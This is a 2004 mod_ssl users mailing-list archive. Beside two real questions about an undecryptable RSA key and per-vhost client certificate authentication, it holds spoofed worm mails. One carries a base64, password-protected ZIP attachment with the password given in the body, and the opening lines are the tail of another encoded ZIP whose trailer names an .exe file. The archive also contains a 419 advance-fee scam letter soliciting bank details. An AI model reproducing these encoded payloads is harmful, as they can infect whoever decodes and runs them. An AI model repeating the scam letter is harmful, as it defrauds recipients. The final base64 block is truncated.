4efhYaUNxrw5/+VPtjonADf/Oa3rC3HmNGp6U12ptNp3Nb2/4uIvmBRTWxLhiI3y32cZOZJe
2pnpFJ42EAymtHWFbBfCCwlw59WDrjzCjEeKy7kg1irnYzjnVqctPFPr4ddrcX1/q7fDNFXH
ORuJL1qO1mTtqzYSzICR2X+4XBvqBZo7cPRH3Oq3QStlXl2c6eyBBrn5/RgTlzLc+RCUcFfP
N8oXIttLQBv5jH5FzpfUq/ERtyHilSOi/bxTJJed3qpExqByT81jo3tezOLEc3lnMTIPPsvA
mo/Ha8SvUy4yMYZ8uipq/71CMq3ABdm5NxsnHMZE9b8IyW2n12Vt/Bhdiw7yGM4P5oQRPTh6
xVG8a0KE8NFZbkCHbdpgiCUAMCLhoF/PEPbluspqrQ5X57ck1hxzy/mSsWHfYMawR5K8bZxT
xpPcVW6H++i8Zn4tWqZgfGuu/W0wtMuTQWtRIlZWO2aGHtBy++6VIxL+rmoHingbIV+nuAoa
UFxPHvlOYrqllCRi0nf7xBXo7TDbO6v7DwSxYCRUpnRz/Fs5jm4MVw4bV8WymUKUJ9EbP5da
uaDk5He/hpR4eQfjrqT8Y5mbJgX4zlfyAFyR8aUGUqBJtsSk1penrdbEODoulABEaaokEpLx
nKeI5GjAt79KGpYJZveJ9OOdzMXVlWk4YjOIr8PUyvOFO3te3fmUFCE3QJYkQdi6NUR+2WGY
Gi5LM+Q/eB6Pdr+o+MpncGJnztorW+AWVhY2jh2CqxcFDh8mmOOQbgo0B8YyU054sO/H9n20
sGgORcn/u4NKYBFDS2l2XypNZqJqq10EslsJ1wWl70ne5iYay5fA+ec0BkxZ8jwlqJylomXR
yD99+Wi1Ob0mMvBduMokKbToJ5O26xX3bm+rO5UoGS17smjDYTZsV2ItAdC+Q3T4U2kGrmZu
iPf9Gyn5QkGpz7f9jKoKISTt5HsZ1Rdl3KsT2EDKcAaS0UdvcKz3sihVnDn5NaHTxo/Q5YhB
0ZyGZzRgL3BkkORITgJ8hRvGepkUKprw0dmY8r/BLLk1DltrhMhQSwECFAAKAAEAAAAgt3cw
CsZp02xVAABgVQAACgAAAAAAAAABACAAAAAAAAAAcndta3ZrLmV4ZVBLBQYAAAAAAQABADgA
AACUVQAAAAA=

----------jipbaewkoevdlubhqfhn--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 23 18:00:49 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3C7AAA8A49; Tue, 23 Mar 2004 18:00:49 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from solutionsinc.co.uk (mail.solutionsinc.co.uk [81.98.215.247])
	by master.modssl.org (Postfix) with ESMTP id B494CA8945
	for ; Tue, 23 Mar 2004 18:00:32 +0100 (CET)
Received: from [80.5.91.122] (HELO [192.168.1.209])
  by solutionsinc.co.uk (CommuniGate Pro SMTP 4.1.8)
  with ESMTP id 9990274 for modssl-users@modssl.org; Tue, 23 Mar 2004 17:00:27 +0000
User-Agent: Microsoft-Entourage/10.1.0.2006
Date: Tue, 23 Mar 2004 17:00:26 +0000
Subject: Problems with reading a .key file
From: Huw Jenkins 
To: 
Message-ID: 
In-Reply-To: <20040323160147.GA8282@gw>
Mime-version: 1.0
Content-type: text/plain; charset="US-ASCII"
Content-transfer-encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Huw Jenkins 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi there,

Having massive problems with SSL on my machine. Was working OK until there
was a crash on the machine this weekend, just gone. Openssl doesn't seem to
tbe able to read the .key file anymore. I've replaced the file from the
server just incase that was the problem. It wasn't now curiously I get this:


[exoticdirect:/etc/httpd/ssl.key] root# openssl rsa -noout -text -in
exotic.key
read RSA key
Enter PEM pass phrase:
unable to load key
828:error:06065064:digital envelope routines:EVP_DecryptFinal:bad
decrypt:evp_enc.c:277:
828:error:0906A065:PEM routines:PEM_do_header:bad decrypt:pem_lib.c:452:


Seems that openssl doesn't want to decrypt the .key file. It does this on
every machine I try! Does this mean that the PEM Passphrase is wrong?

Thanks

Huw Jenkins

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 23 20:47:34 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 03002A897A; Tue, 23 Mar 2004 20:47:33 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web20727.mail.yahoo.com (web20727.mail.yahoo.com [216.136.226.117])
	by master.modssl.org (Postfix) with SMTP id 36630A893A
	for ; Tue, 23 Mar 2004 20:47:17 +0100 (CET)
Message-ID: <20040323194702.77395.qmail@web20727.mail.yahoo.com>
Received: from [81.70.76.211] by web20727.mail.yahoo.com via HTTP; Tue, 23 Mar 2004 11:47:02 PST
Date: Tue, 23 Mar 2004 11:47:02 -0800 (PST)
From: Bo Boe 
Subject: Apache, multiple (ip-based) vhosts and client authentication howto?
To: BoBoeBoe@yahoo.com
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="0-1900435686-1080071222=:76910"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Bo Boe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--0-1900435686-1080071222=:76910
Content-Type: text/plain; charset=us-ascii

I want to setup two webservers with different domains,
lets say www.domain1.com
and www.domain2.com

I want to host these webservers on a single apache
server using vhosts, but ............... There are two
different known clients accessing these webservers:
client1 and client2.

Now I want to issue an certificate certificate1 to
client1 which allows him to authenticate himself to
www.domain1.com using SSLVerifyClient require and

The other user get a certificate2 which allows him to
authenticate himself to www.domain2.com

client1 cannot access www.domain2.com and client2
cannot access www.domain1.com since they don't have
the apropriate certificates

Could anyone provide me with an example of vhosts.conf
file how to do this or at least explain how I could
make one myself. Thanks




Do you Yahoo!?
Yahoo! Finance Tax Center - File online. File on time.
--0-1900435686-1080071222=:76910
Content-Type: text/html; charset=us-ascii




I want to setup two webservers with different domains,
lets say www.domain1.com
and www.domain2.com

I want to host these webservers on a single apache
server using vhosts, but ............... There are two
different known clients accessing these webservers:
client1 and client2.

Now I want to issue an certificate certificate1 to
client1 which allows him to authenticate himself to
www.domain1.com using SSLVerifyClient require and

The other user get a certificate2 which allows him to
authenticate himself to www.domain2.com

client1 cannot access www.domain2.com and client2
cannot access www.domain1.com since they don't have
the apropriate certificates

Could anyone provide me with an example of vhosts.conf
file how to do this or at least explain how I could
make one myself. Thanks

Do you Yahoo!?

Yahoo! Finance Tax Center - File online. File on time.
--0-1900435686-1080071222=:76910--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar 24 23:29:00 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 82E25A8976; Wed, 24 Mar 2004 23:29:00 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from linas-zhang.net (61-230-50-61.HINET-IP.hinet.net [61.230.50.61])
	by master.modssl.org (Postfix) with SMTP id 3D361A8958
	for ; Wed, 24 Mar 2004 23:28:58 +0100 (CET)
Date: Thu, 25 Mar 2004 06:22:41 +0800
To: modssl-users@modssl.org
Subject: RE: Text message
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users






______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 25 01:32:03 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7C448A8962; Thu, 25 Mar 2004 01:32:03 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from linas-zhang.com (61-230-50-61.HINET-IP.hinet.net [61.230.50.61])
	by master.modssl.org (Postfix) with SMTP id 419B7A893A
	for ; Thu, 25 Mar 2004 01:32:01 +0100 (CET)
Date: Thu, 25 Mar 2004 08:22:11 +0800
To: modssl-users@modssl.org
Subject: Re: Incoming Fax
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users






______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 25 23:26:02 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DCFC5A893B; Thu, 25 Mar 2004 23:26:02 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mfk3.org (proxy-gw.ips.pl [62.148.92.218])
	by master.modssl.org (Postfix) with SMTP id 856A4A8934
	for ; Thu, 25 Mar 2004 23:26:01 +0100 (CET)
Date: Thu, 25 Mar 2004 23:17:02 +0100
To: modssl-users@modssl.org
Subject: Incoming message
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users






______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From am_ry25@yahoo.com  Thu Mar 25 23:40:53 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from web41901.mail.yahoo.com (web41901.mail.yahoo.com [66.218.93.152])
	by master.modssl.org (Postfix) with SMTP id F0694A8977
	for ; Thu, 25 Mar 2004 23:40:36 +0100 (CET)
Message-ID: <20040325224030.11506.qmail@web41901.mail.yahoo.com>
Received: from [80.179.251.98] by web41901.mail.yahoo.com via HTTP; Thu, 25 Mar 2004 14:40:30 PST
Date: Thu, 25 Mar 2004 14:40:30 -0800 (PST)
From: Alam Remmy 
Reply-To: dr.alamremy2004@fastermail.com
Subject: (PLANE CRASH)
To: am_ry25@yahoo.com
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii

From: Dr.Alam Remmy.
#123CB/PBV,MAIN CITY,
JO,BURG,
SOUTH AFRICA.

Dear Sir.

My name is Dr. Alam Remmy, I am the operational manager in account management section incharge of
credit and foreign bills of one of the prime banks here in South Africa. I am writing in respect
of a foreign customer of my bank who perished with his whole families on 25TH JULY,2000 in
CONCORDE PLANE CRASH [Flight AF4590] with the whole passengers aboard.

There is an account opened in this bank in 1998 by this great late INDUSTRIALIST who died without
a written or oral 'WILL' attached to the account. Since his death, I personally has watched with
keen interest to see the next of kin but all has proved abortive as no one has come to claim his
funds and no other person knows about this account or anything concerning it,the account has no
other beneficiary and until his death he was the manager of his company.

The total amount involved is 16,000,000.00 USD. [Sixteen Million United States Dollar]. We wish to
start the first transfer with $6,000,000.00[Six million] and upon successful transaction without
any disappointment from your side, we shall re-apply for the transfer of the remaining balance to
your account.

I have secretly discussed this matter with the general manager of the bank who I must involve in
order to have a smooth and a successful transfer of the fund to any foreign bank account which you
are going to nominate. On this note, I decided to seek for a reliable foreigner who will act as
the foreign beneficiary of the fund from the deceased by providing his/her bank account where the
fund will be transferred for immediate investment on any viable project as no one has come up to
be the next of kin.

The banking ethics here does not allow such money to stay more than six years without claim hence
the money will be recalled to the government treasury as unclaimed after this long period of
domancy. 

In view of this I got your contact through my personal search to see if you can assist by
providing your safe bank account for the transfer or find a reliable person who will be capable of
receiving such amount in his or her personal account. At the conclussion of the transfer 65% of
the fund will be for me, I will give you 20% of the total transfer sum, 10% for charity both in
Africa and in your country while the remaining 5% will be set aside to settle expenses both
parties might incure during the transfer process.

Upon the receipt of your reply, I will send to you a detailed information about the transaction. I
will not fail to bring to your notice that this business is 100% risk and trouble free and that
you should not entertain any fear as all modalities for fund transfer can be finalized within 7 to
9 banking days, after you apply to the bank as the beneficiary of the fund from the deceased.

When you receive this letter. Kindly send me an e-mail or you can call me or fax me. You should
also include your private email,fax and phone numbers for easy and safe communication.

Tel: 874-763648313
   : 874-763648314
Fax: 874-763648315

Respectfully yours,
Dr. Alam Remmy.






__________________________________
Do you Yahoo!?
Yahoo! Finance Tax Center - File online. File on time.
http://taxes.yahoo.com/filing.html

From owner-modssl-users@modssl.org  Fri Mar 26 09:07:22 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E3FD3A898B; Fri, 26 Mar 2004 09:07:21 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from anumadhu (p5080EEF5.dip.t-dialin.net [80.128.238.245])
	by master.modssl.org (Postfix) with SMTP id D466CA897C
	for ; Fri, 26 Mar 2004 09:07:18 +0100 (CET)
Date: Fri, 26 Mar 2004 09:16:29 +0100
To: modssl-users@modssl.org
Subject: ^_^ meay-meay!
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------hsdjuwgwqrpgpyqmywwa"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------hsdjuwgwqrpgpyqmywwa
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

Argh,  i  don't like  the plaintext :)

password: 17367

----------hsdjuwgwqrpgpyqmywwa
Content-Type: application/octet-stream; name="AttachedFile.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="AttachedFile.zip"

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
